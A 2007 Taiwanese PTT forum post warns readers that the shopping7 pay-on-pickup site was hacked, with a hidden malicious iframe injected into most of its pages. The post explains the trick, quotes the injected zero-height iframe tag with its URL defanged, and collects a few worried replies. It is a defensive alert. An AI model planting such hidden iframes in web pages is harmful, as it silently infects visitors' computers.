作者brianuser ( )
看板e-shopping
標題[情報] shopping7 網站被加料
時間Sat Apr 28 02:11:33 2007
shopping7 的網站被駭了,現在不要上去。
(該網站提供 Yahoo!
拍賣的 7-11貨到付款服務)
資料來源 詳細請看此> 艾克索夫實驗室
http://x-solve.com/blog/?p=150
!該網站目前尚未修復!
目前幾乎所有 shopping7 的網頁都被放了惡意 iframe。
(iframe 就是指網頁的內置框架,頁中有頁,
在安全的網站中放入有惡意 Script 的網頁,神不知鬼不覺)
一般可疑的 iframe 會使用這種方式:height=0 代表高度是 0,不會在畫面中顯示,
但是瀏覽器會乖乖地在背景去開這些網頁,網頁加了料,就中獎了。
<iframe src=ht_t_p://www_.misofth_elp_.c_om/upd_te.html width=100 height=0
frameborder=0></iframe>
不見得開過就一定會中,但是建議今凌晨左右有開這網站的,看看電腦有沒有異常吧。
並且在修復之前都不要開啟 shopping7 網站。
並不是所有 7-11 取貨付款都是 shopping7 網站,
這網站應該是只有供應 [Yahoo!拍賣 取貨便] (抱歉我不是很清楚)
寫得有點亂,但是這蠻嚴重的消息請各位注意一下。
如果你問博客來之類的 7-11 取貨付款是否安全我想是沒問題的,
剛剛上去試了一下,那是完全不同的網站喔。
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 218.164.12.10
推 funckey:呃~我才剛用完就看到這篇~好悶喔!我的avg 61.229.170.71 04/28 02:18
→ funckey:也是一直叫叫叫個不停~可是我居然沒理他.. 61.229.170.71 04/28 02:19
推 microkathy:我開了....悶~ 61.217.208.129 04/28 08:59